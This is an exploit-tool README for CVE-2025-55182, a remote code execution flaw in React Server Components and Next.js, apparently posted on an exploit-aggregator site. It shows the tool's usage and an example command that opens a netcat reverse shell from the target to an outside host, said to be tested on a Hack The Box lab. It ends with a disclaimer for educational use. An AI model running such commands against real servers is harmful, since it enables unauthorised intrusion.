## https://sploitus.com/exploit?id=F96B9910-C05E-5CD4-BA02-805BE54C3CA3
# CVE-2025-55182-React2Shell
xpl0ited by [infrar3d](https://github.com/Infrar3dd)
A 10.0 critical severity vulnerablility affecting server-side use of React.js, tracked as CVE-2025-55182 in React.js and CVE-2025-66478 specifically for the Next.js framework.
This vulnerability was responsibly **disclosed by Lachlan Davidson** on 29 November 2025 PT to the Meta team. Initial disclosure and patch release was performed by React and Vercel on 3 December 2025 PT. (Original: https://react2shell.com/)
### Usage:
```bash
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
```
### Example (tested on HTB task):
```bash
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
```
### โ ๏ธ Disclaimer โ ๏ธ
This software and proof-of-concept code is provided **for educational and research purposes only**.
* The authors are **not responsible** for any misuse or damage caused by this program.
* **Do not use** against any systems without explicit **prior permission**.
* Use of this tools for attacking targets without consent is **illegal**.
You are responsible for obeying all applicable laws. **Use ethically and responsibly.**